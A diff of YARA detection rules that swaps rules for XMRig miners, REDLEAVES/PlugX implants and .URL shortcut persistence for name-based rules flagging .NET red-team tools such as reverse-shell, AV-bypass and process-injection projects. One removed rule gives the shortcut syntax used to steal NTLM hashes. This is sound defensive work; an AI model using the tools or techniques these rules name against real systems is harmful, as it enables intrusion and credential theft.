 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "532e602dfc8e44326e381d0e2a189b60bc4d4f2b310169767b2326e01606a542"
+		logic_hash = "e8cecfe09f1cb80eb693eb293dfb8c1bc3885a96dfa045b2391216c5f6f6f983"
 		score = 75
 		quality = 85
-		tags = "HIGHVOL, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0"
-		hash2 = "08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7"
-		hash3 = "f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5"
-		hash4 = "0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2"
 
 	strings:
-		$s1 = "'h' hashrate, 'p' pause, 'r' resume" fullword ascii
-		$s2 = "--cpu-affinity" ascii
-		$s3 = "set process affinity to CPU core(s), mask 0x3 for cores 0 and 1" ascii
-		$s4 = "password for mining server" fullword ascii
-		$s5 = "XMRig/%s libuv/%s%s" fullword ascii
+		$name = "NativePayload_ARP" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and filesize < 10MB and 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_XMRIG_Monero_Miner_Config : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_C2Bridge : FILE
 {
 	meta:
-		description = "Auto-generated rule - from files config.json, config.json"
-		author = "Florian Roth (Nextron Systems)"
-		id = "374efe7f-9ef2-5974-8e24-f749183ab2d0"
-		date = "2018-01-04"
-		modified = "2023-12-05"
-		reference = "https://github.com/xmrig/xmrig/releases"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pua_xmrig_monero_miner.yar#L35-L51"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "357051aa-61ea-5454-a996-b4e3a45ac865"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/cobbr/C2Bridge"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L586-L599"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5df14af366cdb0a5bf6fd88b50876fd78abfe0b795cf10af8fab0d23a54f700f"
+		logic_hash = "d5f6d6e9d475bf2d8a49d7550bf3b718539753f3494b58462094bfc0a37b813a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "031333d44a3a917f9654d7e7257e00c9d961ada3bee707de94b7c7d06234909a"
-		hash2 = "409b6ec82c3bdac724dae702e20cb7f80ca1e79efa4ff91212960525af016c41"
 
 	strings:
-		$s2 = "\"cpu-affinity\": null,   // set process affinity to CPU core(s), mask \"0x3\" for cores 0 and 1" fullword ascii
-		$s5 = "\"nicehash\": false                  // enable nicehash/xmrig-proxy support" fullword ascii
-		$s8 = "\"algo\": \"cryptonight\",  // cryptonight (default) or cryptonight-lite" fullword ascii
+		$name = "C2Bridge" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x0a7b or uint16( 0 ) == 0x0d7b ) and filesize < 5KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_PUA_LNX_XMRIG_Cryptominer : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Infrastructure_Assessment : FILE
 {
 	meta:
-		description = "Detects XMRIG CryptoMiner software"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bbdeff2e-68cc-5bbe-b843-3cba9c8c7ea8"
-		date = "2018-06-28"
-		modified = "2023-01-06"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pua_xmrig_monero_miner.yar#L53-L70"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "efacc12b-92b3-5b22-b5bb-cd5a7d7eea0e"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/NyaMeeEain/Infrastructure-Assessment"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L601-L614"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "501bc5b2d38882f48d1ef972dbbd379afb89f2e7c9bf69192c7bee2e19384816"
+		logic_hash = "7b2f1481c2880b5b3ee158f2a526ab7fc5e587bbf3847ebe9ddf447742109a78"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "10a72f9882fc0ca141e39277222a8d33aab7f7a4b524c109506a407cd10d738c"
 
 	strings:
-		$x1 = "number of hash blocks to process at a time (don't set or 0 enables automatic selection o" fullword ascii
-		$s2 = "'h' hashrate, 'p' pause, 'r' resume, 'q' shutdown" fullword ascii
-		$s3 = "* THREADS:      %d, %s, aes=%d, hf=%zu, %sdonate=%d%%" fullword ascii
-		$s4 = ".nicehash.com" ascii
+		$name = "Infrastructure-Assessment" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 8000KB and ( 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_SUSP_XMRIG_String : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Shellcodetester : FILE
 {
 	meta:
-		description = "Detects a suspicious XMRIG crypto miner executable string in filr"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8c6f3e6e-df2a-51b7-81b8-21cd33b3c603"
-		date = "2018-12-28"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pua_xmrig_monero_miner.yar#L72-L84"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "964093a4-e6d7-51b7-928a-b1cd40dc11cc"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/tophertimzen/shellcodeTester"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L616-L629"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d2c3145c50939e7f407125f7b9312161724b7b1a6fcbf7e27d049e49e982c7e9"
-		score = 65
+		logic_hash = "3101b62428eba5e36572a190bd3a11f59cf9cca10aec3cfe3000028f1b1f0a3f"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		hash1 = "eb18ae69f1511eeb4ed9d4d7bcdf3391a06768f384e94427f4fc3bd21b383127"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "xmrig.exe" fullword ascii
+		$name = "shellcodeTester" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Dropper_Deploysmalwareviasideloading
+rule SIGNATURE_BASE_HKTL_NET_NAME_Gray_Hat_Csharp_Code : FILE
 {
 	meta:
-		description = "Detects a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX"
-		author = "USG"
-		id = "2e7cdedd-2358-5d71-a3ec-73dec442d840"
-		date = "2017-04-28"
-		modified = "2024-04-17"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_uscert_ta17-1117a.yar#L9-L21"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "0a94cadc-cc7b-5817-8788-bb1e53937fad"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/brandonprry/gray_hat_csharp_code"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L631-L644"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "51d8a0785bc25cf02460b9b7490ccba3d67806c953e6aa3d3882341ce11857fa"
+		logic_hash = "4520528cd6b1832c97fa79442f9d448d54bad4e6944984fa6e71f34246259e28"
 		score = 75
 		quality = 85
-		tags = ""
-		true_positive = "5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx. "
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$UniqueString = {2e 6c 6e 6b [0-14] 61 76 70 75 69 2e 65 78 65}
-		$PsuedoRandomStringGenerator = {b9 1a [0-6] f7 f9 46 80 c2 41 88 54 35 8b 83 fe 64}
+		$name = "gray_hat_csharp_code" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_REDLEAVES_Droppedfile_Implantloader_Starburn
+rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_Reverseshell : FILE
 {
 	meta:
-		description = "Detects the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT"
-		author = "USG"
-		id = "976f42b1-58c9-554b-97e6-130a657507e2"
-		date = "2017-04-28"
-		modified = "2024-04-17"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_uscert_ta17-1117a.yar#L23-L34"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "eec77c09-02db-5d74-8526-e201d2fe6fc8"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/DamonMohammadbagher/NativePayload_ReverseShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L646-L659"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2ebfdaf363ac80bc9bace3056ff86efd9c1b246c6f60373a82df4a0db901a6e3"
+		logic_hash = "79ebde95674d76e58938b06a97cb6c65e6ac0606398fc9c30d90e517bbdd62a8"
 		score = 75
 		quality = 85
-		tags = ""
-		true_positive = "7f8a867a8302fe58039a6db254d335ae"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$XOR_Loop = {32 0c 3a 83 c2 02 88 0e 83 fa 08 [4-14] 32 0c 3a 83 c2 02 88 0e 83 fa 10}
+		$name = "NativePayload_ReverseShell" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_REDLEAVES_Droppedfile_Obfuscatedshellcodeandrat_Handkerchief
+rule SIGNATURE_BASE_HKTL_NET_NAME_Dotnetavbypass : FILE
 {
 	meta:
-		description = "Detects obfuscated .dat file containing shellcode and core REDLEAVES RAT"
-		author = "USG"
-		id = "51a28529-1084-5f24-9369-6427e8d51d9d"
-		date = "2017-04-28"
-		modified = "2024-04-17"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_uscert_ta17-1117a.yar#L36-L47"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "918eba2b-150d-5e69-bed0-0979ae889165"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/mandreko/DotNetAVBypass"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L661-L674"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f91bd1ddd6691a0a5b6ebc6a28d35bb5b2e6c00754f07e58ffb01e06ad590ae3"
+		logic_hash = "574a5f1bc1873321042e932ddfd53853e8e06dff3b25f2ad41e6b8aaf150a8b2"
 		score = 75
-		quality = 83
-		tags = ""
-		true_positive = "fb0c714cd2ebdcc6f33817abe7813c36"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$RedleavesStringObfu = {73 64 65 5e 60 74 75 74 6c 6f 60 6d 5e 6d 64 60 77 64 72 5e 65 6d 6d 6c 60 68 6f 2f 65 6d 6d}
+		$name = "DotNetAVBypass" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_REDLEAVES_Coreimplant_Uniquestrings : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Hexyrunner : FILE
 {
 	meta:
-		description = "Strings identifying the core REDLEAVES RAT in its deobfuscated state"
-		author = "USG"
-		id = "fd4d4804-f7d9-549d-8f63-5f409d6180f9"
-		date = "2018-12-20"
-		modified = "2024-04-17"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_uscert_ta17-1117a.yar#L49-L64"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "67741b4d-7336-5c88-8f2c-e48c10b187b9"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/bao7uo/HexyRunner"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L676-L689"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ce6ab0f4007f3ea3c31442cab702ad3579faa6835d5ee9b4c03516ce0499bf3e"
+		logic_hash = "c55be1fe285358378a98fd1027650dd20dd8cd0aad4dc062df7a0d4538c78c3b"
 		score = 75
-		quality = 81
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$unique2 = "RedLeavesSCMDSimulatorMutex" nocase wide ascii
-		$unique4 = "red_autumnal_leaves_dllmain.dll" wide ascii
-		$unique7 = "\\NamePipe_MoreWindows" wide ascii
+		$name = "HexyRunner" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		not uint32( 0 ) == 0x66676572 and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_PLUGX_Redleaves
+rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpoffensiveshell : FILE
 {
 	meta:
-		description = "Detects specific RedLeaves and PlugX binaries"
-		author = "US-CERT Code Analysis Team"
-		id = "ede8ad8f-31cf-5314-9777-bddd60e499f2"
-		date = "2017-03-04"
-		date = "2017-04-03"
-		modified = "2024-04-17"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_uscert_ta17-1117a.yar#L66-L93"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "f223fb95-9f16-5504-a6ce-de9d75b38eaa"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/darkr4y/SharpOffensiveShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L691-L704"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0c52110eb18dcdb7a0d4b8c42f22368acdd1bce44a192abcd71a20bee2705475"
+		logic_hash = "36bcae7817eed375e48822a49e6875295ea1037217231a7f9ae88a9b8af95530"
 		score = 75
 		quality = 85
-		tags = ""
-		incident = "10118538"
-		MD5_1 = "598FF82EA4FB52717ACAFB227C83D474"
-		MD5_2 = "7D10708A518B26CC8C3CBFBAA224E032"
-		MD5_3 = "AF406D35C77B1E0DF17F839E36BCE630"
-		MD5_4 = "6EB9E889B091A5647F6095DCD4DE7C83"
-		MD5_5 = "566291B277534B63EAFC938CDAAB8A399E41AF7D"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = { 80343057403D2FD0010072F433C08BFF80343024403D2FD0010072F4 }
-		$s1 = "C:\\Users\\user\\Desktop\\my_OK_2014\\bit9\\runsna\\Release\\runsna.pdb"
-		$s2 = "d:\\work\\plug4.0(shellcode)"
-		$s3 = "\\shellcode\\shellcode\\XSetting.h"
-		$s4 = { 42AFF4276A45AA58474D4C4BE03D5B395566BEBCBDEDE9972872C5C4C5498228 }
-		$s5 = { 8AD32AD002D180C23830140E413BCB7CEF6A006A006A00566A006A00 }
-		$s6 = { EB055F8BC7EB05E8F6FFFFFF558BEC81ECC8040000535657 }
-		$s7 = { 8A043233C932043983C10288043283F90A7CF242890D18AA00103BD37CE2891514AA00106A006A006A0056 }
-		$s8 = { 293537675A402A333557B05E04D09CB05EB3ADA4A4A40ED0B7DAB7935F5B5B08 }
-		$s9 = "RedLeavesCMDSimulatorMutex"
+		$name = "SharpOffensiveShell" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		$s0 or $s1 or $s2 and $s3 or $s4 or $s5 or $s6 or $s7 or $s8 or $s9
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Local_URL : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Reconness : FILE
 {
 	meta:
-		description = "Detects local script usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)"
-		id = "438d9323-cb6a-5f5d-af71-76692b93436a"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1176184798248919044"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L2-L19"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "a30188e4-d96a-59d0-9f51-d7a7e07b14ba"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/reconness/reconness"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L706-L719"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e95e5e97760d9b565184c588fdafe8408cdab61959aee5221485df53ef5f51d6"
-		score = 50
+		logic_hash = "9cb7a3522bada1c724999058ec4ddfde09b22166f8fb3ba184dfe6bec276cfc5"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$file = "URL=file:///" nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$name = "reconness" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		$file and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_SMB_URL : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Tvasion : FILE
 {
 	meta:
-		description = "Detects remote SMB path for .URL persistence"
-		author = "@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)"
-		id = "e23609a1-9b18-5a56-92ee-c7f84c966865"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1176184798248919044"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L21-L39"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "324cddc6-36d9-5670-827e-24e80dcc66a9"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/loadenmb/tvasion"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L721-L734"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e0bef7497fcb284edb0c65b59d511830"
-		logic_hash = "4903c8f4bb08e799f6787ad29cf7688f354f97a065bcd24c58d3ccd3778a6a15"
-		score = 50
-		quality = 60
+		logic_hash = "b6262f751cbb85e702d89e7c5b4efdc8eaf3085101cd7685218ab1e8a2599385"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$file = /URL=file:\/\/[a-z0-9]/ nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$name = "tvasion" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		$file and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Iconremote_Smborlocal : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Ibombshell : FILE
 {
 	meta:
-		description = "This is the syntax used for NTLM hash stealing via Responder - https://www.securify.nl/nl/blog/SFY20180501/living-off-the-land_-stealing-netntlm-hashes.html"
-		author = "@itsreallynick (Nick Carr)"
-		id = "9362ce46-265c-5215-bee1-3d784d0cb928"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/ItsReallyNick/status/1176241449148588032"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L61-L78"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "02f3272f-8e75-5df4-9052-a315ae202050"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/Telefonica/ibombshell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L736-L749"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8c49908c7f52ebcd512ff2dc8c40392767769130b9d39abb9d5fc9e130edb65c"
-		score = 50
+		logic_hash = "30de65328e2e2230eca3a30490e20c2c6d8ac9bdc835ee15d44300a00b801921"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$icon = "IconFile=file://" nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$name = "ibombshell" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		$icon and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Methodology_Shortcut_Hotkey : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Remoteprocessinjection : FILE
 {
 	meta:
-		description = "Detects possible shortcut usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr)"
-		id = "0ce377c4-db9b-59fa-987b-a77eaf408765"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1176184798248919044"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L80-L97"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "f1698cf2-211a-551a-8bc4-4faefcc6106f"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/Mr-Un1k0d3r/RemoteProcessInjection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L751-L764"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a48f7c1125218ee89f58f1517e81150038a5d71889d847e7690b13c818b32fb5"
-		score = 50
-		quality = 60
+		logic_hash = "87d803c361462877f5ebba2a70f611c95b8684fe9f9f747ccf9643fc4e97d9df"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$hotkey = /[\x0a\x0d]HotKey=[1-9]/ nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$name = "RemoteProcessInjection" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		$hotkey and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Baseurlsyntax : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_CACTUSTORCH : FILE
 {
 	meta:
-		description = "Detects possible shortcut usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr)"
-		id = "cab7b573-d197-5afc-95a9-ef05a07c2b7a"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1176184798248919044"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L99-L117"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "7b1e3015-fada-592c-b120-20aa12247d32"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/mdsecactivebreach/CACTUSTORCH"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L766-L779"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4aa29bedb5689fe16c067f5ea933e56804085712c7469b138d8b658a30a7eb67"
-		score = 50
+		logic_hash = "51a125a44b5d1e73509bcd29865b26f44a5ee53f6907ee9abffa3eef1bbbdea8"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
